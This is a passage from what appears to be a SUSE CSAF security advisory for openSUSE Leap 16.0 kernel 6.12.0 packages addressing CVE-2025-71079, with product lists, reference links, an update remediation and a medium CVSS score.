"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71079",
"url": "https://www.suse.com/security/cve/CVE-2025-71079"
},
{
"category": "external",
"summary": "SUSE Bug 1256619 for CVE-2025-71079",
"url": "https://bugzilla.suse.com/1256619"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
